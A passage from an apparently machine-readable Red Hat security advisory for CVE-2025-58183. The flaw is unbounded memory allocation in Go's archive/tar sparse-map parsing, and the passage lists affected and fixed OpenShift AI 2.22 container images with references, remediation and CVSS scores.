"Red Hat OpenShift AI 2.22:registry.redhat.io/rhoai/odh-model-controller-rhel9@sha256:f43e263fe3aafc8db04394c9132ec7d7cc2b836fc690cd37b1a8892137ea8773_ppc64le",
"Red Hat OpenShift AI 2.22:registry.redhat.io/rhoai/odh-model-registry-operator-rhel9@sha256:901efe4e9867390a89d61d5c945b72b5e2db87202c919a43579f0ca7cfa4cf96_amd64",
"Red Hat OpenShift AI 2.22:registry.redhat.io/rhoai/odh-model-registry-rhel9@sha256:e0a67c5465369eae8e98ccee093dd09f5ccdb445903e2aaec30c978b2b7f10f3_amd64",
"Red Hat OpenShift AI 2.22:registry.redhat.io/rhoai/odh-modelmesh-rhel9@sha256:a3c3c17e6092e760923a8b68c98c6d26c30f81da2f04f0d2e9727461254c7c1a_amd64",
"Red Hat OpenShift AI 2.22:registry.redhat.io/rhoai/odh-modelmesh-runtime-adapter-rhel9@sha256:1dd295d8062d8846ffb2534b2597e2791bd67387904b3d4ccf58cf3424d3250b_amd64",
"Red Hat OpenShift AI 2.22:registry.redhat.io/rhoai/odh-modelmesh-serving-controller-rhel9@sha256:4fb05694fa67a519e11f331e3f1ccf42b1432db2f31b2a857d1f2b3e4e1bd0a3_amd64",
"Red Hat OpenShift AI 2.22:registry.redhat.io/rhoai/odh-notebook-controller-rhel9@sha256:e940d2ce5f41edfbf07e5ae895fa3caa446c013abd41c7cd6d2758ee7336881c_amd64",
"Red Hat OpenShift AI 2.22:registry.redhat.io/rhoai/odh-operator-bundle@sha256:bd589f792b321203c6ffe2bf92e47f1e3951fbd29a8be65529cc5766bff94c98_amd64",
"Red Hat OpenShift AI 2.22:registry.redhat.io/rhoai/odh-rhel9-operator@sha256:67e8ec35eb13e8a46a46955f33bbc8eeb18d757a5f40935219218ebb750d5eda_ppc64le",
"Red Hat OpenShift AI 2.22:registry.redhat.io/rhoai/odh-rhel9-operator@sha256:8b76cfe4556e2b4a8f5207304c06d7ea83992e223926b8802ddd7b2ee413431d_s390x",
"Red Hat OpenShift AI 2.22:registry.redhat.io/rhoai/odh-rhel9-operator@sha256:a54f8bf1f15cd0ab0a13dbb0b0d4295748e8a5ae8b938a38417d9ea5b1d78396_amd64",
"Red Hat OpenShift AI 2.22:registry.redhat.io/rhoai/odh-rhel9-operator@sha256:b8d56e4d1a79cf0840284ad245a86e16db33a2239fd429e38752bf4d27a7dd9e_arm64",
"Red Hat OpenShift AI 2.22:registry.redhat.io/rhoai/odh-training-operator-rhel9@sha256:251d85ebf9721e704561b6e6a5822106887f24b0602ce50e9d70e2db1817ee7d_amd64",
"Red Hat OpenShift AI 2.22:registry.redhat.io/rhoai/odh-trustyai-service-operator-rhel9@sha256:3038dad86bc403803c630511c3808ec35ddaa3260cc1280f8f4afbf538eb507d_amd64"
]
}
],
"ids": [
{
"system_name": "Red Hat Bugzilla ID",
"text": "2407258"
}
],
"notes": [
{
"category": "description",
"text": "A flaw was found in the archive/tar package in the Go standard library. tar.Reader does not set a maximum size on the number of sparse region data blocks in GNU tar pax 1.0 sparse files. A specially crafted tar archive with a pax header indicating a big number of sparse regions can cause a Go program to try to allocate a large amount of memory, causing an out-of-memory condition and resulting in a denial of service.",
"title": "Vulnerability description"
},
{
"category": "summary",
"text": "golang: archive/tar: Unbounded allocation when parsing GNU sparse map",
"title": "Vulnerability summary"
},
{
"category": "other",
"text": "To exploit this issue, an attacker needs to be able to process a specially crafted GNU tar pax 1.0 archive with the application using the archive/tar package. Additionally, this issue can cause the Go application to allocate a large amount of memory, eventually leading to an out-of-memory condition and resulting in a denial of service with no other security impact. Due to these reasons, this flaw has been rated with a moderate severity.",
"title": "Statement"
},
{
"category": "general",
"text": "The CVSS score(s) listed for this vulnerability do not reflect the associated product\u0027s status, and are included for informational purposes to better understand the severity of this vulnerability.",
"title": "CVSS score applicability"
}
],
"product_status": {
"fixed": [
"Red Hat OpenShift AI 2.22:registry.redhat.io/rhoai/odh-trustyai-service-rhel9@sha256:51d96b6945dee9049b7728f4612a01a46dd8b533bf76cced602d032ccd03f4da_amd64"
],
"known_not_affected": [
"Red Hat OpenShift AI 2.22:registry.redhat.io/rhoai/odh-codeflare-operator-rhel9@sha256:8b3e0152680063828a54187feec06600de866db91ab219911b1c3ab50d8b1b7c_amd64",
"Red Hat OpenShift AI 2.22:registry.redhat.io/rhoai/odh-dashboard-rhel9@sha256:3f8491f3004efaaf8a508cc7ad139dafae667a3c2f3e31736ade9997e4eb789b_s390x",
"Red Hat OpenShift AI 2.22:registry.redhat.io/rhoai/odh-dashboard-rhel9@sha256:7908a416df1a7a29de0fc89b788c7fb8a3fba85a2e80cd93a52efcf20d0c2fdd_amd64",
"Red Hat OpenShift AI 2.22:registry.redhat.io/rhoai/odh-dashboard-rhel9@sha256:bbb139905574a6d29e855a0a6df56f71e036f3e425ee3393a70e384610939259_ppc64le",
"Red Hat OpenShift AI 2.22:registry.redhat.io/rhoai/odh-dashboard-rhel9@sha256:fe5d3cdb7fb4658dc46111d20ee03b890b438458ee7d20a55871d59a35a3b926_arm64",
"Red Hat OpenShift AI 2.22:registry.redhat.io/rhoai/odh-data-science-pipelines-argo-argoexec-rhel9@sha256:86ac0f8f1d05b6fb02523108448414ec494d630544b3eb6de2f1ad593e67f704_amd64",
"Red Hat OpenShift AI 2.22:registry.redhat.io/rhoai/odh-data-science-pipelines-argo-workflowcontroller-rhel9@sha256:c7456669d7f87f0194f4dd38559c73d75c441027c25cd487a24b25d7539f917d_amd64",
"Red Hat OpenShift AI 2.22:registry.redhat.io/rhoai/odh-data-science-pipelines-operator-controller-rhel9@sha256:f27180fd3c4c24fdc014bf09554a16a598a4215d7e9d1106015d7b5e976167fe_amd64",
"Red Hat OpenShift AI 2.22:registry.redhat.io/rhoai/odh-feast-operator-rhel9@sha256:3fa33fb9fd238dda3dd0dbc5243d0ec3e82083fb9ecf557a5f8a5b67afc77ba8_amd64",
"Red Hat OpenShift AI 2.22:registry.redhat.io/rhoai/odh-feature-server-rhel9@sha256:d5d52b368050d505183452f1d8b5170c86f7473fd869a886777d3bf7e48aad76_amd64",
"Red Hat OpenShift AI 2.22:registry.redhat.io/rhoai/odh-kf-notebook-controller-rhel9@sha256:687875287e4317041637f6b47741e484df49e3b2d55ef871021e4ac9f0d99886_amd64",
"Red Hat OpenShift AI 2.22:registry.redhat.io/rhoai/odh-kuberay-operator-controller-rhel9@sha256:2d796962cc7622fcc7eb0456eb70439cbb04a5e679f7de8826416a99a9851c62_amd64",
"Red Hat OpenShift AI 2.22:registry.redhat.io/rhoai/odh-kueue-controller-rhel9@sha256:b7de90247a93ad5b39c83be7cea5ba4a36d1cb55a37179157433edce2d2a9c63_amd64",
"Red Hat OpenShift AI 2.22:registry.redhat.io/rhoai/odh-ml-pipelines-api-server-v2-rhel9@sha256:854eb235c46dc89cbd324d4b632ff0d07840d3e60744c66e9be8298d3d3d4631_amd64",
"Red Hat OpenShift AI 2.22:registry.redhat.io/rhoai/odh-ml-pipelines-driver-rhel9@sha256:f092ae49cdb78c33c051718472448bfd16d4d50918116b3fe988dec267abd2bb_amd64",
"Red Hat OpenShift AI 2.22:registry.redhat.io/rhoai/odh-ml-pipelines-launcher-rhel9@sha256:46a17b6f764f05a7f81ce3d9c01dd24f11049bfc9f625a4953fd68f7935fe2a4_amd64",
"Red Hat OpenShift AI 2.22:registry.redhat.io/rhoai/odh-ml-pipelines-persistenceagent-v2-rhel9@sha256:3cbc5336af0b8c06c641d864d7b45ce04576e38dbc8636573abb94c37eedeb18_amd64",
"Red Hat OpenShift AI 2.22:registry.redhat.io/rhoai/odh-ml-pipelines-runtime-generic-rhel9@sha256:65a5dbc53f8f89bf05f4eac1081c022d3d7459917025c8e99a684f6be679eb98_amd64",
"Red Hat OpenShift AI 2.22:registry.redhat.io/rhoai/odh-ml-pipelines-scheduledworkflow-v2-rhel9@sha256:8c97392bb11def5cf310f7992d19d22b4f015e0040faf0fe59044ac63c186d2f_amd64",
"Red Hat OpenShift AI 2.22:registry.redhat.io/rhoai/odh-mlmd-grpc-server-rhel9@sha256:bfa7bfad599fed7e758dcd892f6a207144070daf288339b25186f94e8b763a1b_amd64",
"Red Hat OpenShift AI 2.22:registry.redhat.io/rhoai/odh-mm-rest-proxy-rhel9@sha256:974ebc1a016a1ccac1683fee653afedd2628e2315cf2cc726b40fb5135aaca93_amd64",
"Red Hat OpenShift AI 2.22:registry.redhat.io/rhoai/odh-model-controller-rhel9@sha256:0bd79a7eecc255d6d69acd0002c517652638cdf31a0014aa534bf8e3b233b667_arm64",
"Red Hat OpenShift AI 2.22:registry.redhat.io/rhoai/odh-model-controller-rhel9@sha256:0f03bb40db834eb444df20dd54473d082ccc6816df6efa0e6166dcaf8c86e3ab_s390x",
"Red Hat OpenShift AI 2.22:registry.redhat.io/rhoai/odh-model-controller-rhel9@sha256:65953d54df30fcba632c78d2bdabce81796413baeee6a826d0815df45b99d527_amd64",
"Red Hat OpenShift AI 2.22:registry.redhat.io/rhoai/odh-model-controller-rhel9@sha256:f43e263fe3aafc8db04394c9132ec7d7cc2b836fc690cd37b1a8892137ea8773_ppc64le",
"Red Hat OpenShift AI 2.22:registry.redhat.io/rhoai/odh-model-registry-operator-rhel9@sha256:901efe4e9867390a89d61d5c945b72b5e2db87202c919a43579f0ca7cfa4cf96_amd64",
"Red Hat OpenShift AI 2.22:registry.redhat.io/rhoai/odh-model-registry-rhel9@sha256:e0a67c5465369eae8e98ccee093dd09f5ccdb445903e2aaec30c978b2b7f10f3_amd64",
"Red Hat OpenShift AI 2.22:registry.redhat.io/rhoai/odh-modelmesh-rhel9@sha256:a3c3c17e6092e760923a8b68c98c6d26c30f81da2f04f0d2e9727461254c7c1a_amd64",
"Red Hat OpenShift AI 2.22:registry.redhat.io/rhoai/odh-modelmesh-runtime-adapter-rhel9@sha256:1dd295d8062d8846ffb2534b2597e2791bd67387904b3d4ccf58cf3424d3250b_amd64",
"Red Hat OpenShift AI 2.22:registry.redhat.io/rhoai/odh-modelmesh-serving-controller-rhel9@sha256:4fb05694fa67a519e11f331e3f1ccf42b1432db2f31b2a857d1f2b3e4e1bd0a3_amd64",
"Red Hat OpenShift AI 2.22:registry.redhat.io/rhoai/odh-notebook-controller-rhel9@sha256:e940d2ce5f41edfbf07e5ae895fa3caa446c013abd41c7cd6d2758ee7336881c_amd64",
"Red Hat OpenShift AI 2.22:registry.redhat.io/rhoai/odh-operator-bundle@sha256:bd589f792b321203c6ffe2bf92e47f1e3951fbd29a8be65529cc5766bff94c98_amd64",
"Red Hat OpenShift AI 2.22:registry.redhat.io/rhoai/odh-rhel9-operator@sha256:67e8ec35eb13e8a46a46955f33bbc8eeb18d757a5f40935219218ebb750d5eda_ppc64le",
"Red Hat OpenShift AI 2.22:registry.redhat.io/rhoai/odh-rhel9-operator@sha256:8b76cfe4556e2b4a8f5207304c06d7ea83992e223926b8802ddd7b2ee413431d_s390x",
"Red Hat OpenShift AI 2.22:registry.redhat.io/rhoai/odh-rhel9-operator@sha256:a54f8bf1f15cd0ab0a13dbb0b0d4295748e8a5ae8b938a38417d9ea5b1d78396_amd64",
"Red Hat OpenShift AI 2.22:registry.redhat.io/rhoai/odh-rhel9-operator@sha256:b8d56e4d1a79cf0840284ad245a86e16db33a2239fd429e38752bf4d27a7dd9e_arm64",
"Red Hat OpenShift AI 2.22:registry.redhat.io/rhoai/odh-training-operator-rhel9@sha256:251d85ebf9721e704561b6e6a5822106887f24b0602ce50e9d70e2db1817ee7d_amd64",
"Red Hat OpenShift AI 2.22:registry.redhat.io/rhoai/odh-trustyai-service-operator-rhel9@sha256:3038dad86bc403803c630511c3808ec35ddaa3260cc1280f8f4afbf538eb507d_amd64"
]
},
"references": [
{
"category": "self",
"summary": "Canonical URL",
"url": "https://access.redhat.com/security/cve/CVE-2025-58183"
},
{
"category": "external",
"summary": "RHBZ#2407258",
"url": "https://bugzilla.redhat.com/show_bug.cgi?id=2407258"
},
{
"category": "external",
"summary": "https://www.cve.org/CVERecord?id=CVE-2025-58183",
"url": "https://www.cve.org/CVERecord?id=CVE-2025-58183"
},
{
"category": "external",
"summary": "https://nvd.nist.gov/vuln/detail/CVE-2025-58183",
"url": "https://nvd.nist.gov/vuln/detail/CVE-2025-58183"
},
{
"category": "external",
"summary": "https://go.dev/cl/709861",
"url": "https://go.dev/cl/709861"
},
{
"category": "external",
"summary": "https://go.dev/issue/75677",
"url": "https://go.dev/issue/75677"
},
{
"category": "external",
"summary": "https://groups.google.com/g/golang-announce/c/4Emdl2iQ_bI",
"url": "https://groups.google.com/g/golang-announce/c/4Emdl2iQ_bI"
},
{
"category": "external",
"summary": "https://pkg.go.dev/vuln/GO-2025-4014",
"url": "https://pkg.go.dev/vuln/GO-2025-4014"
}
],
"release_date": "2025-10-29T22:10:14.376000+00:00",
"remediations": [
{
"category": "vendor_fix",
"date": "2025-12-04T13:06:08+00:00",
"details": "For Red Hat OpenShift AI 2.22.3 see the following documentation, which will be updated shortly for this release, for important instructions on how to upgrade your cluster and fully apply this errata update:\n\nhttps://docs.redhat.com/en/documentation/red_hat_openshift_ai/",
"product_ids": [
"Red Hat OpenShift AI 2.22:registry.redhat.io/rhoai/odh-trustyai-service-rhel9@sha256:51d96b6945dee9049b7728f4612a01a46dd8b533bf76cced602d032ccd03f4da_amd64"
],
"restart_required": {
"category": "none"
},
"url": "https://access.redhat.com/errata/RHSA-2025:22759"
},
{
"category": "workaround",
"details": "Mitigation for this issue is either not available or the currently available options do not meet the Red Hat Product Security criteria comprising ease of use and deployment, applicability to widespread installation base or stability.",
"product_ids": [
"Red Hat OpenShift AI 2.22:registry.redhat.io/rhoai/odh-codeflare-operator-rhel9@sha256:8b3e0152680063828a54187feec06600de866db91ab219911b1c3ab50d8b1b7c_amd64",
"Red Hat OpenShift AI 2.22:registry.redhat.io/rhoai/odh-dashboard-rhel9@sha256:3f8491f3004efaaf8a508cc7ad139dafae667a3c2f3e31736ade9997e4eb789b_s390x",
"Red Hat OpenShift AI 2.22:registry.redhat.io/rhoai/odh-dashboard-rhel9@sha256:7908a416df1a7a29de0fc89b788c7fb8a3fba85a2e80cd93a52efcf20d0c2fdd_amd64",
"Red Hat OpenShift AI 2.22:registry.redhat.io/rhoai/odh-dashboard-rhel9@sha256:bbb139905574a6d29e855a0a6df56f71e036f3e425ee3393a70e384610939259_ppc64le",
"Red Hat OpenShift AI 2.22:registry.redhat.io/rhoai/odh-dashboard-rhel9@sha256:fe5d3cdb7fb4658dc46111d20ee03b890b438458ee7d20a55871d59a35a3b926_arm64",
"Red Hat OpenShift AI 2.22:registry.redhat.io/rhoai/odh-data-science-pipelines-argo-argoexec-rhel9@sha256:86ac0f8f1d05b6fb02523108448414ec494d630544b3eb6de2f1ad593e67f704_amd64",
"Red Hat OpenShift AI 2.22:registry.redhat.io/rhoai/odh-data-science-pipelines-argo-workflowcontroller-rhel9@sha256:c7456669d7f87f0194f4dd38559c73d75c441027c25cd487a24b25d7539f917d_amd64",
"Red Hat OpenShift AI 2.22:registry.redhat.io/rhoai/odh-data-science-pipelines-operator-controller-rhel9@sha256:f27180fd3c4c24fdc014bf09554a16a598a4215d7e9d1106015d7b5e976167fe_amd64",
"Red Hat OpenShift AI 2.22:registry.redhat.io/rhoai/odh-feast-operator-rhel9@sha256:3fa33fb9fd238dda3dd0dbc5243d0ec3e82083fb9ecf557a5f8a5b67afc77ba8_amd64",
"Red Hat OpenShift AI 2.22:registry.redhat.io/rhoai/odh-feature-server-rhel9@sha256:d5d52b368050d505183452f1d8b5170c86f7473fd869a886777d3bf7e48aad76_amd64",
"Red Hat OpenShift AI 2.22:registry.redhat.io/rhoai/odh-kf-notebook-controller-rhel9@sha256:687875287e4317041637f6b47741e484df49e3b2d55ef871021e4ac9f0d99886_amd64",
"Red Hat OpenShift AI 2.22:registry.redhat.io/rhoai/odh-kuberay-operator-controller-rhel9@sha256:2d796962cc7622fcc7eb0456eb70439cbb04a5e679f7de8826416a99a9851c62_amd64",
"Red Hat OpenShift AI 2.22:registry.redhat.io/rhoai/odh-kueue-controller-rhel9@sha256:b7de90247a93ad5b39c83be7cea5ba4a36d1cb55a37179157433edce2d2a9c63_amd64",
"Red Hat OpenShift AI 2.22:registry.redhat.io/rhoai/odh-ml-pipelines-api-server-v2-rhel9@sha256:854eb235c46dc89cbd324d4b632ff0d07840d3e60744c66e9be8298d3d3d4631_amd64",
"Red Hat OpenShift AI 2.22:registry.redhat.io/rhoai/odh-ml-pipelines-driver-rhel9@sha256:f092ae49cdb78c33c051718472448bfd16d4d50918116b3fe988dec267abd2bb_amd64",
"Red Hat OpenShift AI 2.22:registry.redhat.io/rhoai/odh-ml-pipelines-launcher-rhel9@sha256:46a17b6f764f05a7f81ce3d9c01dd24f11049bfc9f625a4953fd68f7935fe2a4_amd64",
"Red Hat OpenShift AI 2.22:registry.redhat.io/rhoai/odh-ml-pipelines-persistenceagent-v2-rhel9@sha256:3cbc5336af0b8c06c641d864d7b45ce04576e38dbc8636573abb94c37eedeb18_amd64",
"Red Hat OpenShift AI 2.22:registry.redhat.io/rhoai/odh-ml-pipelines-runtime-generic-rhel9@sha256:65a5dbc53f8f89bf05f4eac1081c022d3d7459917025c8e99a684f6be679eb98_amd64",
"Red Hat OpenShift AI 2.22:registry.redhat.io/rhoai/odh-ml-pipelines-scheduledworkflow-v2-rhel9@sha256:8c97392bb11def5cf310f7992d19d22b4f015e0040faf0fe59044ac63c186d2f_amd64",
"Red Hat OpenShift AI 2.22:registry.redhat.io/rhoai/odh-mlmd-grpc-server-rhel9@sha256:bfa7bfad599fed7e758dcd892f6a207144070daf288339b25186f94e8b763a1b_amd64",
"Red Hat OpenShift AI 2.22:registry.redhat.io/rhoai/odh-mm-rest-proxy-rhel9@sha256:974ebc1a016a1ccac1683fee653afedd2628e2315cf2cc726b40fb5135aaca93_amd64",
"Red Hat OpenShift AI 2.22:registry.redhat.io/rhoai/odh-model-controller-rhel9@sha256:0bd79a7eecc255d6d69acd0002c517652638cdf31a0014aa534bf8e3b233b667_arm64",
"Red Hat OpenShift AI 2.22:registry.redhat.io/rhoai/odh-model-controller-rhel9@sha256:0f03bb40db834eb444df20dd54473d082ccc6816df6efa0e6166dcaf8c86e3ab_s390x",
"Red Hat OpenShift AI 2.22:registry.redhat.io/rhoai/odh-model-controller-rhel9@sha256:65953d54df30fcba632c78d2bdabce81796413baeee6a826d0815df45b99d527_amd64",
"Red Hat OpenShift AI 2.22:registry.redhat.io/rhoai/odh-model-controller-rhel9@sha256:f43e263fe3aafc8db04394c9132ec7d7cc2b836fc690cd37b1a8892137ea8773_ppc64le",
"Red Hat OpenShift AI 2.22:registry.redhat.io/rhoai/odh-model-registry-operator-rhel9@sha256:901efe4e9867390a89d61d5c945b72b5e2db87202c919a43579f0ca7cfa4cf96_amd64",
"Red Hat OpenShift AI 2.22:registry.redhat.io/rhoai/odh-model-registry-rhel9@sha256:e0a67c5465369eae8e98ccee093dd09f5ccdb445903e2aaec30c978b2b7f10f3_amd64",
"Red Hat OpenShift AI 2.22:registry.redhat.io/rhoai/odh-modelmesh-rhel9@sha256:a3c3c17e6092e760923a8b68c98c6d26c30f81da2f04f0d2e9727461254c7c1a_amd64",
"Red Hat OpenShift AI 2.22:registry.redhat.io/rhoai/odh-modelmesh-runtime-adapter-rhel9@sha256:1dd295d8062d8846ffb2534b2597e2791bd67387904b3d4ccf58cf3424d3250b_amd64",
"Red Hat OpenShift AI 2.22:registry.redhat.io/rhoai/odh-modelmesh-serving-controller-rhel9@sha256:4fb05694fa67a519e11f331e3f1ccf42b1432db2f31b2a857d1f2b3e4e1bd0a3_amd64",
"Red Hat OpenShift AI 2.22:registry.redhat.io/rhoai/odh-notebook-controller-rhel9@sha256:e940d2ce5f41edfbf07e5ae895fa3caa446c013abd41c7cd6d2758ee7336881c_amd64",
"Red Hat OpenShift AI 2.22:registry.redhat.io/rhoai/odh-operator-bundle@sha256:bd589f792b321203c6ffe2bf92e47f1e3951fbd29a8be65529cc5766bff94c98_amd64",
"Red Hat OpenShift AI 2.22:registry.redhat.io/rhoai/odh-rhel9-operator@sha256:67e8ec35eb13e8a46a46955f33bbc8eeb18d757a5f40935219218ebb750d5eda_ppc64le",
"Red Hat OpenShift AI 2.22:registry.redhat.io/rhoai/odh-rhel9-operator@sha256:8b76cfe4556e2b4a8f5207304c06d7ea83992e223926b8802ddd7b2ee413431d_s390x",
"Red Hat OpenShift AI 2.22:registry.redhat.io/rhoai/odh-rhel9-operator@sha256:a54f8bf1f15cd0ab0a13dbb0b0d4295748e8a5ae8b938a38417d9ea5b1d78396_amd64",
"Red Hat OpenShift AI 2.22:registry.redhat.io/rhoai/odh-rhel9-operator@sha256:b8d56e4d1a79cf0840284ad245a86e16db33a2239fd429e38752bf4d27a7dd9e_arm64",
"Red Hat OpenShift AI 2.22:registry.redhat.io/rhoai/odh-training-operator-rhel9@sha256:251d85ebf9721e704561b6e6a5822106887f24b0602ce50e9d70e2db1817ee7d_amd64",
"Red Hat OpenShift AI 2.22:registry.redhat.io/rhoai/odh-trustyai-service-operator-rhel9@sha256:3038dad86bc403803c630511c3808ec35ddaa3260cc1280f8f4afbf538eb507d_amd64",
"Red Hat OpenShift AI 2.22:registry.redhat.io/rhoai/odh-trustyai-service-rhel9@sha256:51d96b6945dee9049b7728f4612a01a46dd8b533bf76cced602d032ccd03f4da_amd64"
]
}
],
"scores": [
{
"cvss_v3": {
"attackComplexity": "LOW",
"attackVector": "NETWORK",
"availabilityImpact": "HIGH",
"baseScore": 7.5,
"baseSeverity": "HIGH",
"confidentialityImpact": "NONE",
"integrityImpact": "NONE",
"privilegesRequired": "NONE",
"scope": "UNCHANGED",
"userInteraction": "NONE",
"vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H",
"version": "3.1"
},
"products": [
"Red Hat OpenShift AI 2.22:registry.redhat.io/rhoai/odh-codeflare-operator-rhel9@sha256:8b3e0152680063828a54187feec06600de866db91ab219911b1c3ab50d8b1b7c_amd64",
"Red Hat OpenShift AI 2.22:registry.redhat.io/rhoai/odh-dashboard-rhel9@sha256:3f8491f3004efaaf8a508cc7ad139dafae667a3c2f3e31736ade9997e4eb789b_s390x",
"Red Hat OpenShift AI 2.22:registry.redhat.io/rhoai/odh-dashboard-rhel9@sha256:7908a416df1a7a29de0fc89b788c7fb8a3fba85a2e80cd93a52efcf20d0c2fdd_amd64",
"Red Hat OpenShift AI 2.22:registry.redhat.io/rhoai/odh-dashboard-rhel9@sha256:bbb139905574a6d29e855a0a6df56f71e036f3e425ee3393a70e384610939259_ppc64le",
"Red Hat OpenShift AI 2.22:registry.redhat.io/rhoai/odh-dashboard-rhel9@sha256:fe5d3cdb7fb4658dc46111d20ee03b890b438458ee7d20a55871d59a35a3b926_arm64",
"Red Hat OpenShift AI 2.22:registry.redhat.io/rhoai/odh-data-science-pipelines-argo-argoexec-rhel9@sha256:86ac0f8f1d05b6fb02523108448414ec494d630544b3eb6de2f1ad593e67f704_amd64",
"Red Hat OpenShift AI 2.22:registry.redhat.io/rhoai/odh-data-science-pipelines-argo-workflowcontroller-rhel9@sha256:c7456669d7f87f0194f4dd38559c73d75c441027c25cd487a24b25d7539f917d_amd64",
"Red Hat OpenShift AI 2.22:registry.redhat.io/rhoai/odh-data-science-pipelines-operator-controller-rhel9@sha256:f27180fd3c4c24fdc014bf09554a16a598a4215d7e9d1106015d7b5e976167fe_amd64",
"Red Hat OpenShift AI 2.22:registry.redhat.io/rhoai/odh-feast-operator-rhel9@sha256:3fa33fb9fd238dda3dd0dbc5243d0ec3e82083fb9ecf557a5f8a5b67afc77ba8_amd64",
"Red Hat OpenShift AI 2.22:registry.redhat.io/rhoai/odh-feature-server-rhel9@sha256:d5d52b368050d505183452f1d8b5170c86f7473fd869a886777d3bf7e48aad76_amd64",
"Red Hat OpenShift AI 2.22:registry.redhat.io/rhoai/odh-kf-notebook-controller-rhel9@sha256:687875287e4317041637f6b47741e484df49e3b2d55ef871021e4ac9f0d99886_amd64",
"Red Hat OpenShift AI 2.22:registry.redhat.io/rhoai/odh-kuberay-operator-controller-rhel9@sha256:2d796962cc7622fcc7eb0456eb70439cbb04a5e679f7de8826416a99a9851c62_amd64",
"Red Hat OpenShift AI 2.22:registry.redhat.io/rhoai/odh-kueue-controller-rhel9@sha256:b7de90247a93ad5b39c83be7cea5ba4a36d1cb55a37179157433edce2d2a9c63_amd64",
"Red Hat OpenShift AI 2.22:registry.redhat.io/rhoai/odh-ml-pipelines-api-server-v2-rhel9@sha256:854eb235c46dc89cbd324d4b632ff0d07840d3e60744c66e9be8298d3d3d4631_amd64",
"Red Hat OpenShift AI 2.22:registry.redhat.io/rhoai/odh-ml-pipelines-driver-rhel9@sha256:f092ae49cdb78c33c051718472448bfd16d4d50918116b3fe988dec267abd2bb_amd64",
"Red Hat OpenShift AI 2.22:registry.redhat.io/rhoai/odh-ml-pipelines-launcher-rhel9@sha256:46a17b6f764f05a7f81ce3d9c01dd24f11049bfc9f625a4953fd68f7935fe2a4_amd64",
"Red Hat OpenShift AI 2.22:registry.redhat.io/rhoai/odh-ml-pipelines-persistenceagent-v2-rhel9@sha256:3cbc5336af0b8c06c641d864d7b45ce04576e38dbc8636573abb94c37eedeb18_amd64",
"Red Hat OpenShift AI 2.22:registry.redhat.io/rhoai/odh-ml-pipelines-runtime-generic-rhel9@sha256:65a5dbc53f8f89bf05f4eac1081c022d3d7459917025c8e99a684f6be679eb98_amd64",
"Red Hat OpenShift AI 2.22:registry.redhat.io/rhoai/odh-ml-pipelines-scheduledworkflow-v2-rhel9@sha256:8c97392bb11def5cf310f7992d19d22b4f015e0040faf0fe59044ac63c186d2f_amd64",
"Red Hat OpenShift AI 2.22:registry.redhat.io/rhoai/odh-mlmd-grpc-server-rhel9@sha256:bfa7bfad599fed7e758dcd892f6a207144070daf288339b25186f94e8b763a1b_amd64",
"Red Hat OpenShift AI 2.22:registry.redhat.io/rhoai/odh-mm-rest-proxy-rhel9@sha256:974ebc1a016a1ccac1683fee653afedd2628e2315cf2cc726b40fb5135aaca93_amd64",
"Red Hat OpenShift AI 2.22:registry.redhat.io/rhoai/odh-model-controller-rhel9@sha256:0bd79a7eecc255d6d69acd0002c517652638cdf31a0014aa534bf8e3b233b667_arm64",
"Red Hat OpenShift AI 2.22:registry.redhat.io/rhoai/odh-model-controller-rhel9@sha256:0f03bb40db834eb444df20dd54473d082ccc6816df6efa0e6166dcaf8c86e3ab_s390x",
"Red Hat OpenShift AI 2.22:registry.redhat.io/rhoai/odh-model-controller-rhel9@sha256:65953d54df30fcba632c78d2bdabce81796413baeee6a826d0815df45b99d527_amd64",
"Red Hat OpenShift AI 2.22:registry.redhat.io/rhoai/odh-model-controller-rhel9@sha256:f43e263fe3aafc8db04394c9132ec7d7cc2b836fc690cd37b1a8892137ea8773_ppc64le",
"Red Hat OpenShift AI 2.22:registry.redhat.io/rhoai/odh-model-registry-operator-rhel9@sha256:901efe4e9867390a89d61d5c945b72b5e2db87202c919a43579f0ca7cfa4cf96_amd64",
"Red Hat OpenShift AI 2.22:registry.redhat.io/rhoai/odh-model-registry-rhel9@sha256:e0a67c5465369eae8e98ccee093dd09f5ccdb445903e2aaec30c978b2b7f10f3_amd64",
"Red Hat OpenShift AI 2.22:registry.redhat.io/rhoai/odh-modelmesh-rhel9@sha256:a3c3c17e6092e760923a8b68c98c6d26c30f81da2f04f0d2e9727461254c7c1a_amd64",
"Red Hat OpenShift AI 2.22:registry.redhat.io/rhoai/odh-modelmesh-runtime-adapter-rhel9@sha256:1dd295d8062d8846ffb2534b2597e2791bd67387904b3d4ccf58cf3424d3250b_amd64",
"Red Hat OpenShift AI 2.22:registry.redhat.io/rhoai/odh-modelmesh-serving-controller-rhel9@sha256:4fb05694fa67a519e11f331e3f1ccf42b1432db2f31b2a857d1f2b3e4e1bd0a3_amd64",
"Red Hat OpenShift AI 2.22:registry.redhat.io/rhoai/odh-notebook-controller-rhel9@sha256:e940d2ce5f41edfbf07e5ae895fa3caa446c013abd41c7cd6d2758ee7336881c_amd64",
"Red Hat OpenShift AI 2.22:registry.redhat.io/rhoai/odh-operator-bundle@sha256:bd589f792b321203c6ffe2bf92e47f1e3951fbd29a8be65529cc5766bff94c98_amd64",
"Red Hat OpenShift AI 2.22:registry.redhat.io/rhoai/odh-rhel9-operator@sha256:67e8ec35eb13e8a46a46955f33bbc8eeb18d757a5f40935219218ebb750d5eda_ppc64le",
"Red Hat OpenShift AI 2.22:registry.redhat.io/rhoai/odh-rhel9-operator@sha256:8b76cfe4556e2b4a8f5207304c06d7ea83992e223926b8802ddd7b2ee413431d_s390x",
"Red Hat OpenShift AI 2.22:registry.redhat.io/rhoai/odh-rhel9-operator@sha256:a54f8bf1f15cd0ab0a13dbb0b0d4295748e8a5ae8b938a38417d9ea5b1d78396_amd64",
"Red Hat OpenShift AI 2.22:registry.redhat.io/rhoai/odh-rhel9-operator@sha256:b8d56e4d1a79cf0840284ad245a86e16db33a2239fd429e38752bf4d27a7dd9e_arm64",
"Red Hat OpenShift AI 2.22:registry.redhat.io/rhoai/odh-training-operator-rhel9@sha256:251d85ebf9721e704561b6e6a5822106887f24b0602ce50e9d70e2db1817ee7d_amd64",
"Red Hat OpenShift AI 2.22:registry.redhat.io/rhoai/odh-trustyai-service-operator-rhel9@sha256:3038dad86bc403803c630511c3808ec35ddaa3260cc1280f8f4afbf538eb507d_amd64",
"Red Hat OpenShift AI 2.22:registry.redhat.io/rhoai/odh-trustyai-service-rhel9@sha256:51d96b6945dee9049b7728f4612a01a46dd8b533bf76cced602d032ccd03f4da_amd64"
]
}
],
"threats": [
{
"category": "impact",
"details": "Moderate"
}
],
